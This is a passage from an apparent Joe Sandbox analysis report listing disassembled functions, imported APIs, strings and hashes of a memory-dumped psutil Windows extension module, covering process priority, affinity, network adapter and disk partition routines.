GetLastError.KERNEL32 ref: 00007FFB9DD655F1
GetPriorityClass.KERNEL32 ref: 00007FFB9DD6562A
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD65638
CloseHandle.KERNEL32 ref: 00007FFB9DD65641

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

CloseHandle.KERNEL32 ref: 00007FFB9DD65657
Py_BuildValue.PYTHON3 ref: 00007FFB9DD65666

Strings

automatically set for PID 0, xrefs: 00007FFB9DD655CB
OpenProcess, xrefs: 00007FFB9DD655FC

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseErr_Handle$Arg_BuildCallClassDeallocErrorFromFunctionLastObjectObject_OpenParsePriorityProcessTupleValueWindows
String ID: OpenProcess$automatically set for PID 0
API String ID: 1753720984-2746090705
Opcode ID: 261146d4c444c7521d2cc4ffe72d4223482171d327919a566f034f2f947f5804
Instruction ID: 9152dd62fd1457436d0135636d23f3d2c252db9b558e454d517cfd033575492f
Opcode Fuzzy Hash: 261146d4c444c7521d2cc4ffe72d4223482171d327919a566f034f2f947f5804
Instruction Fuzzy Hash: CE21C6A1B1C94382FB749B77F85417923A1AF5D780FC57031DA8E42265FE2CE484C380

Function 00007FFB9DD6A23C Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFB9DD6A264
__scrt_initialize_crt.LIBCMT ref: 00007FFB9DD6A2A9
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFB9DD6A2B6
_RTC_Initialize.LIBCMT ref: 00007FFB9DD6A2E4
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFB9DD6A30A
__scrt_release_startup_lock.LIBCMT ref: 00007FFB9DD6A335

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: e6f5dbe589a2c3995ad2bc0b24e51e0ee76866c95b2c60f85b8e695e3761c329
Instruction ID: de01fe7c47aba0a0f5fc4754c083d60d0fb025e211e94a9fcc2a13c69a511fd1
Opcode Fuzzy Hash: e6f5dbe589a2c3995ad2bc0b24e51e0ee76866c95b2c60f85b8e695e3761c329
Instruction Fuzzy Hash: A5815EE1F0C64346FA709BB7D4412B96290AF8D780FD4B035DACD67796FE2CE8458680

Function 00007FFB9DD65680 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD6569E
OpenProcess.KERNEL32 ref: 00007FFB9DD656C8
GetLastError.KERNEL32 ref: 00007FFB9DD656D6
SetPriorityClass.KERNEL32 ref: 00007FFB9DD65713
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD6571F
CloseHandle.KERNEL32 ref: 00007FFB9DD65728

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

CloseHandle.KERNEL32 ref: 00007FFB9DD6573E

Strings

automatically set for PID 0, xrefs: 00007FFB9DD656B0
OpenProcess, xrefs: 00007FFB9DD656E1

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseErr_Handle$Arg_CallClassDeallocErrorFromFunctionLastObjectObject_OpenParsePriorityProcessTupleWindows
String ID: OpenProcess$automatically set for PID 0
API String ID: 4056584219-2746090705
Opcode ID: 15169f86702ad4971ce2abd0ce0dc3fd6ba16e4ede2ef9804ab03194ea32df0c
Instruction ID: dfc9ded75bb018a6087e68aeb0f7e0fda94b725dbc2ab296866983a1864cc850
Opcode Fuzzy Hash: 15169f86702ad4971ce2abd0ce0dc3fd6ba16e4ede2ef9804ab03194ea32df0c
Instruction Fuzzy Hash: A12153A1B1DA0282EB749B77F88417923A1EF9D780FC56035DA9E42665FE2CE484C780

Function 00007FFB9DD65B50 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD65B6E
OpenProcess.KERNEL32 ref: 00007FFB9DD65B98
GetLastError.KERNEL32 ref: 00007FFB9DD65BA6
SetProcessAffinityMask.KERNEL32 ref: 00007FFB9DD65BE4
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD65BF0
CloseHandle.KERNEL32 ref: 00007FFB9DD65BF9

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

CloseHandle.KERNEL32 ref: 00007FFB9DD65C0F

Strings

automatically set for PID 0, xrefs: 00007FFB9DD65B80
OpenProcess, xrefs: 00007FFB9DD65BB1

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseErr_HandleProcess$AffinityArg_CallDeallocErrorFromFunctionLastMaskObjectObject_OpenParseTupleWindows
String ID: OpenProcess$automatically set for PID 0
API String ID: 3581221727-2746090705
Opcode ID: fa3fa82f6b551e7269b9b07355541d8575d2c45b76d037af1835dc1a31d048db
Instruction ID: 56e662769961f5d99814440a7c84e2d532553b8bdf38622c8cd61fb4e9f630b9
Opcode Fuzzy Hash: fa3fa82f6b551e7269b9b07355541d8575d2c45b76d037af1835dc1a31d048db
Instruction Fuzzy Hash: 152141A1B1DA0681EB749F3BF84427963A1EF5CB80FC56035DA8E42765FE2CE4848780

Function 00007FFB9DD63670 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI ref: 00007FFB9DD63690
PyErr_SetString.PYTHON3 ref: 00007FFB9DD636AC
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD636C2
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD636D0

Strings

GetAdaptersAddresses() syscall failed., xrefs: 00007FFB9DD636A2, 00007FFB9DD6371F

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Err_$AdaptersAddressesMemoryStringmalloc
String ID: GetAdaptersAddresses() syscall failed.
API String ID: 626373182-4058666537
Opcode ID: f268da7f3e54d4729961f0b4698a17396fd60a5383146018dc32a09b834da337
Instruction ID: 5db43feb019e0543687ab6079c4c6c69501e554f2ec4e644db78467add4a1a28
Opcode Fuzzy Hash: f268da7f3e54d4729961f0b4698a17396fd60a5383146018dc32a09b834da337
Instruction Fuzzy Hash: 35213075B18E8282EB24DB77E85056963A1FF8DB44FC96035DA8E46B14FF3DD4098A40

Function 00007FFB9DD62180 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 38COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD621A7
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD621C4
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD621CE
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD621DE
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD621E8
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD621F8

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD621BD
psutil/arch/windows\cpu.c, xrefs: 00007FFB9DD621B3
GetActiveProcessorCount() not available; using GetSystemInfo(), xrefs: 00007FFB9DD621D7

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: __acrt_iob_funcfprintf
String ID: GetActiveProcessorCount() not available; using GetSystemInfo()$psutil-debug [%s:%d]> $psutil/arch/windows\cpu.c
API String ID: 3693261709-2941878183
Opcode ID: c5b043be2e10d404285f8f5e9a4273391728c037684a47e0c341a3cd5ffcbaab
Instruction ID: 107e07a28e6d7f1dcab0d218d969d912d27bb2cf97a77e3b0f422e00957dd27a
Opcode Fuzzy Hash: c5b043be2e10d404285f8f5e9a4273391728c037684a47e0c341a3cd5ffcbaab
Instruction Fuzzy Hash: A41109E0F08A0281FB349B77E8912B52661AF4DB80FC02137C58E463F1FE2CA58583C1

Function 00007FFB9DD672A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD672C0
OpenProcess.KERNEL32 ref: 00007FFB9DD672E0
PyErr_Clear.PYTHON3 ref: 00007FFB9DD6730D

Part of subcall function 00007FFB9DD67A40: GetLastError.KERNEL32(?,?,?,00007FFB9DD64116), ref: 00007FFB9DD67A5D

CloseHandle.KERNEL32 ref: 00007FFB9DD672FD
CloseHandle.KERNEL32 ref: 00007FFB9DD67307
PyUnicode_FromWideChar.PYTHON3 ref: 00007FFB9DD67370
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD67381

Strings

psutil_pid_is_running -> 0, xrefs: 00007FFB9DD6731E

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseHandle$Arg_CharClearErr_ErrorFromLastOpenParseProcessTupleUnicode_Widefree
String ID: psutil_pid_is_running -> 0
API String ID: 865494411-3467909595
Opcode ID: 6d34e352a73c4d35ee2cc0d1545ec051cbc9bb0d4908c44f6338ed070a0d18c8
Instruction ID: 8e9c65db31950316026d2c27dafd2378acf69559c2b21143d6e6c019bc91c831
Opcode Fuzzy Hash: 6d34e352a73c4d35ee2cc0d1545ec051cbc9bb0d4908c44f6338ed070a0d18c8
Instruction Fuzzy Hash: A42195A5B0CA4652EB348B73E45017A5391AF4CBA0F946135DEAD47AD4FE3CD4448780

Function 00007FFB9DD65F42 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD65F69
PyList_Append.PYTHON3 ref: 00007FFB9DD65F7D
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65F96
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FA5
VirtualQueryEx.KERNEL32 ref: 00007FFB9DD65FC1
CloseHandle.KERNEL32 ref: 00007FFB9DD65FD3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FED
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FFC
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6600B
CloseHandle.KERNEL32 ref: 00007FFB9DD66019

Strings

xwc, xrefs: 00007FFB9DD65F42
(KsOI), xrefs: 00007FFB9DD65F57

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
String ID: (KsOI)$xwc
API String ID: 1097362947-1454042600
Opcode ID: f1fa03fa6a6b4cd222d345f1fad65bf5d43a73d43af6c6cffd52f021c8af454b
Instruction ID: b77ea130a7d7e1f931a00fff859dd1d57b586a3bf9fcf64bcb132b71bd47ca55
Opcode Fuzzy Hash: f1fa03fa6a6b4cd222d345f1fad65bf5d43a73d43af6c6cffd52f021c8af454b
Instruction Fuzzy Hash: FC111FB1B0EA8285EA708F33E4582796360BFADB95F842032DD8E57754FE3CE0458780

Function 00007FFB9DD65F39 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD65F69
PyList_Append.PYTHON3 ref: 00007FFB9DD65F7D
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65F96
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FA5
VirtualQueryEx.KERNEL32 ref: 00007FFB9DD65FC1
CloseHandle.KERNEL32 ref: 00007FFB9DD65FD3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FED
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FFC
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6600B
CloseHandle.KERNEL32 ref: 00007FFB9DD66019

Strings

xrw, xrefs: 00007FFB9DD65F39
(KsOI), xrefs: 00007FFB9DD65F57

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
String ID: (KsOI)$xrw
API String ID: 1097362947-822595024
Opcode ID: 458c2ee6d20f3bb9de1fac3cb92d40bfc05a4854994c737ec156b289ef9f6c70
Instruction ID: 95cdda18aecbccc17614057aeadd8a8e108e4395de198d3df4e3fb1022b1c9f3
Opcode Fuzzy Hash: 458c2ee6d20f3bb9de1fac3cb92d40bfc05a4854994c737ec156b289ef9f6c70
Instruction Fuzzy Hash: 7B111FB1B0EA8285EA708F33E4582796360BF6DB95F842032DD8E57754FE3CE0458380

Function 00007FFB9DD631FC Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

strcat_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB9DD63233
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63257
PyList_Append.PYTHON3 ref: 00007FFB9DD6326B
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6327E
strchr.VCRUNTIME140 ref: 00007FFB9DD63289
SetErrorMode.KERNEL32 ref: 00007FFB9DD632A0
SetErrorMode.KERNEL32 ref: 00007FFB9DD632B7
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632CB
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632DA

Strings

unknown, xrefs: 00007FFB9DD631FC
(ssss), xrefs: 00007FFB9DD63250

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
String ID: (ssss)$unknown
API String ID: 1595588724-1660319459
Opcode ID: e2826470fad3ed783d4f9c8ca84906cbf311ba82c73cffe1781df9a5fa7549c8
Instruction ID: a6c1ce621be3bbcc70ee0210e514a2085b5da287ca1abf4672b58bd20d9f475e
Opcode Fuzzy Hash: e2826470fad3ed783d4f9c8ca84906cbf311ba82c73cffe1781df9a5fa7549c8
Instruction Fuzzy Hash: D4114FA1B09A8685EA30DF72E8046B963A0FF4CB58FC45035C98E46755FE3CE149C380

Function 00007FFB9DD63205 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

strcat_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB9DD63233
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63257
PyList_Append.PYTHON3 ref: 00007FFB9DD6326B
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6327E
strchr.VCRUNTIME140 ref: 00007FFB9DD63289
SetErrorMode.KERNEL32 ref: 00007FFB9DD632A0
SetErrorMode.KERNEL32 ref: 00007FFB9DD632B7
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632CB
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632DA

Strings

(ssss), xrefs: 00007FFB9DD63250
unmounted, xrefs: 00007FFB9DD63205

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
String ID: (ssss)$unmounted
API String ID: 1595588724-1640327555
Opcode ID: 63ee6a522132240beecb69959a7b9f6fd17ab765508e1b04a84150df5d8db2f5
Instruction ID: 41f3925053f6dc20c48b03929ae9ed06ac981d31d4919946c78bd9499bdac9c9
Opcode Fuzzy Hash: 63ee6a522132240beecb69959a7b9f6fd17ab765508e1b04a84150df5d8db2f5
Instruction Fuzzy Hash: D0114FA1B09A8685EA70DF72E8046B963A0FF4DB98FC45035C98E46755FE3CE149C380

Function 00007FFB9DD6320E Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

strcat_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB9DD63233
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63257
PyList_Append.PYTHON3 ref: 00007FFB9DD6326B
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6327E
strchr.VCRUNTIME140 ref: 00007FFB9DD63289
SetErrorMode.KERNEL32 ref: 00007FFB9DD632A0
SetErrorMode.KERNEL32 ref: 00007FFB9DD632B7
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632CB
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632DA

Strings

(ssss), xrefs: 00007FFB9DD63250
remote, xrefs: 00007FFB9DD6320E

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
String ID: (ssss)$remote
API String ID: 1595588724-821215876
Opcode ID: c5d383849ceb467fe3cd522dbdc1de53e3ce2a76eddd1715da7808da9c4313bb
Instruction ID: 4e0ae54c329859680cae7b538ec8f413083bf5f7afd4d3d37206d34c621327c3
Opcode Fuzzy Hash: c5d383849ceb467fe3cd522dbdc1de53e3ce2a76eddd1715da7808da9c4313bb
Instruction Fuzzy Hash: 11114FA1B09A8685EA30DF72E8046B963A0FF4DB98FC45035C98E46755FE3CE149C380

Function 00007FFB9DD63217 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

strcat_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB9DD63233
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63257
PyList_Append.PYTHON3 ref: 00007FFB9DD6326B
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6327E
strchr.VCRUNTIME140 ref: 00007FFB9DD63289
SetErrorMode.KERNEL32 ref: 00007FFB9DD632A0
SetErrorMode.KERNEL32 ref: 00007FFB9DD632B7
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632CB
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632DA

Strings

(ssss), xrefs: 00007FFB9DD63250
ramdisk, xrefs: 00007FFB9DD63217

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
String ID: (ssss)$ramdisk
API String ID: 1595588724-2792464965
Opcode ID: e91d0a95cf2c3ee6267aabef2deee6cb03a2ff84e2c239d9fae4b4d4be05ec50
Instruction ID: 99488f34a5afbaadbb19b956fa06a79139fd0eb779002b90a0297ab6d7ba8e83
Opcode Fuzzy Hash: e91d0a95cf2c3ee6267aabef2deee6cb03a2ff84e2c239d9fae4b4d4be05ec50
Instruction Fuzzy Hash: EC114FA1B09A8685EA30DF72E8047B963A0FF4CB58FC45035C98E46755FE3CE149C380

Function 00007FFB9DD631E1 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

strcat_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB9DD63233
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63257
PyList_Append.PYTHON3 ref: 00007FFB9DD6326B
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6327E
strchr.VCRUNTIME140 ref: 00007FFB9DD63289
SetErrorMode.KERNEL32 ref: 00007FFB9DD632A0
SetErrorMode.KERNEL32 ref: 00007FFB9DD632B7
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632CB
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632DA

Strings

fixed, xrefs: 00007FFB9DD631E1
(ssss), xrefs: 00007FFB9DD63250

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
String ID: (ssss)$fixed
API String ID: 1595588724-1783892515
Opcode ID: fff5570b5060184986b8caae02e100f9e37fbc8f854c84287e39b5ac5612822b
Instruction ID: dd68d00a1c7e1b9af15d2f53659338812eb73c6d9d4f575fb5284b68d36b5236
Opcode Fuzzy Hash: fff5570b5060184986b8caae02e100f9e37fbc8f854c84287e39b5ac5612822b
Instruction Fuzzy Hash: 9F114FA1B09A8685EA30DF72E8046B963A0FF4CB58FC85035C98E46755FE3CE149C380

Function 00007FFB9DD631EA Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

